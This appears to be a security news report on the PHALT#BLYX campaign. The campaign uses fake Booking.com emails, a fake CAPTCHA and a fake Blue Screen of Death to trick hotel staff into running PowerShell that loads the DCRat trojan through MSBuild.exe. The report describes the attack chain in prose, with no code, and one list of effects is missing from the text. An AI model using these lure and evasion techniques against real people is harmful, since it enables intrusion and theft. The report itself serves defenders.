Cybersecurity researchers have identified a sophisticated phishing and malware campaign, dubbed PHALT#BLYX, targeting the European hospitality sector. The operation relies on highly convincing social engineering techniques that impersonate Booking.com and exploit user trust to deploy the DCRat remote access trojan. By combining fake system errors, trusted Windows utilities, and layered evasion techniques, the attackers demonstrate a mature understanding of modern endpoint defenses and human behavior.

The hospitality industry remains a prime target for cybercriminals due to its high transaction volume, seasonal workforce, and reliance on third-party booking platforms. Threat actors increasingly favor “living-off-the-land” techniques that abuse legitimate system tools, reducing the likelihood of detection. PHALT#BLYX reflects this trend, blending phishing, user-driven execution, and native Windows binaries into a seamless intrusion chain.

According to researchers at Securonix, the campaign was observed in late December 2025. Victims received phishing emails impersonating Booking.com, warning of unexpected reservation cancellations.

The messages directed recipients to a spoofed website designed to mimic Booking.com. From there, victims were funneled through a fake CAPTCHA and presented with a fabricated Blue Screen of Death error instructing them to manually run a command. Following these steps unknowingly initiated a malware infection.

The attack hinges on convincing victims to execute malicious PowerShell commands themselves. These commands download a malicious MSBuild project file, which is executed using the legitimate Windows utility MSBuild.exe.

This technique enables attackers to:

If elevated privileges are unavailable, the malware repeatedly triggers User Account Control prompts in an attempt to coerce user approval. As a diversion, the script opens a legitimate Booking.com administrative page to reduce suspicion.

Once deployed, DCRat provides attackers with extensive control over infected systems. Capabilities include keystroke logging, command execution, credential harvesting, and the ability to deploy additional payloads such as cryptocurrency miners. The use of euros in phishing emails and Russian-language artifacts within the payload suggest deliberate targeting and potential links to Russian-speaking threat actors.

PHALT#BLYX illustrates how modern cyberattacks increasingly blur the line between technical exploitation and psychological manipulation. Rather than relying on software vulnerabilities alone, attackers weaponize trust, urgency, and familiar tools to bypass defenses. Organizations that focus solely on patching without addressing user behavior and process controls remain exposed.

Securonix researchers note that the campaign demonstrates “a deep understanding of modern endpoint protection mechanisms.” The use of trusted binaries like MSBuild.exe, combined with aggressive security tampering, highlights how attackers adapt to hardened environments by shifting execution responsibility onto the victim.